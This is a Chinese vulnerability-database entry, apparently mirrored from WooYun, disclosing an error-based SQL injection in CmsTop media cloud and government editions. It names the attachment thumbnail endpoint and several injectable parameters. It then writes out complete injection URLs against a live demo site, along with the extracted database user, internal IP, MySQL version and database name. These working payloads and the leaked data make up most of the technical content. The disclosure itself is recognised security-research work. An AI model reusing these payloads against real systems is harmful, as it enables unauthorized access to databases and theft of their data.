|CmsTop媒体云&amp;政务版SQL报错注入漏洞（XPATH）

CmsTop媒体云&amp;政务版SQL报错注入漏洞（XPATH）

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： RT 多个参数存在隐患注入比较隐蔽~ ### 详细说明： CMSTOP比较难挖 [WooYun: CMSTOP媒体云&政务版SQL报错注入漏洞（XPATH）](http://www.wooyun.org/bugs/wooyun-2015-0142783) 厂商官网：http://www.cmstop.com/ 产品涉及： ``` CmsTop 媒体版面向媒体提供“PC站＋手机站＋手机端＋平板端”多终端一体化新媒体技术解决方案，助力媒体融合转型。媒体云 CmsTop 媒体云作为媒体云时代的开创者，思拓合众颠覆了传统的软件采购和项目外包模式，与传媒集团建立战略合作伙伴关系，以互联网思维和云计算技术为基础整合集团、区域和行业内的媒体及政务新媒体资源，共同建设和运营媒体云。政务版 CmsTop 政务版面向党政部门提供多终端一体化的网站群私有云技术解决方案，助力党政部门打造“两微一端”政务新媒体。 ``` 在线演示站点： ``` http://www.cmstop.cn/ ``` 这处SQL出在上传附件处。。。第一步，需要注册，内部子项功能比较多 [<img src="https://images.seebug.org/upload/201511/031046373b34f6274530d45c5f1b9eae2b533754.png" alt="1103-SQL.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/031046373b34f6274530d45c5f1b9eae2b533754.png) 然后就找到某子项，上传附件处，抓包正常数据包： [<img src="https://images.seebug.org/upload/201511/031043509af12ee75c2d03bebf12607615969525.png" alt="1103-SQL-OK.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/031043509af12ee75c2d03bebf12607615969525.png) 注入地址： ``` http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250&height=100 ``` 多个参数可注入，如：tags、size、width、height 开发测试可能忽略了这一处 [<img src="https://images.seebug.org/upload/201511/0310471077a7f5ce7bf592b448e9f3b3204cc92f.png" alt="1103-SQL-1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/0310471077a7f5ce7bf592b448e9f3b3204cc92f.png) 证明其中一个参数随便挑一个参数：width 提交： ``` http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250 AND (SELECT 1 FROM (SELECT COUNT(Table_name),CONCAT(user(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)&height=100 ``` [<img src="https://images.seebug.org/upload/201511/031048115886e6bbd526d28ba13d212d430c495a.png" alt="1103-SQL-11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/031048115886e6bbd526d28ba13d212d430c495a.png) 注出用户： ``` site_11701@10.162.64.228 ``` 再注一下版本： ``` http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250 AND (SELECT 1 FROM (SELECT COUNT(Table_name),CONCAT(version(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)&height=100 ``` [<img src="https://images.seebug.org/upload/201511/03104924df65ebc937490156dcc4ee244e69402b.png" alt="1103-SQL-10.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/03104924df65ebc937490156dcc4ee244e69402b.png) 版本： ``` 5.6.20-log ``` 被前人找到漏洞以后厂商进行了相关修复，把一些配置信息改了 ``` http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250 AND (SELECT 1 FROM (SELECT COUNT(Table_name),CONCAT(version(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)&height=100 ``` [<img src="https://images.seebug.org/upload/201511/031055427e8c87756976082f08ebcf806e0810f2.png" alt="1103-SQL-13.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/031055427e8c87756976082f08ebcf806e0810f2.png) 数据库名被改为： ``` site_MDAwMDExN1zAx1 ``` ### 漏洞证明：已证明

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™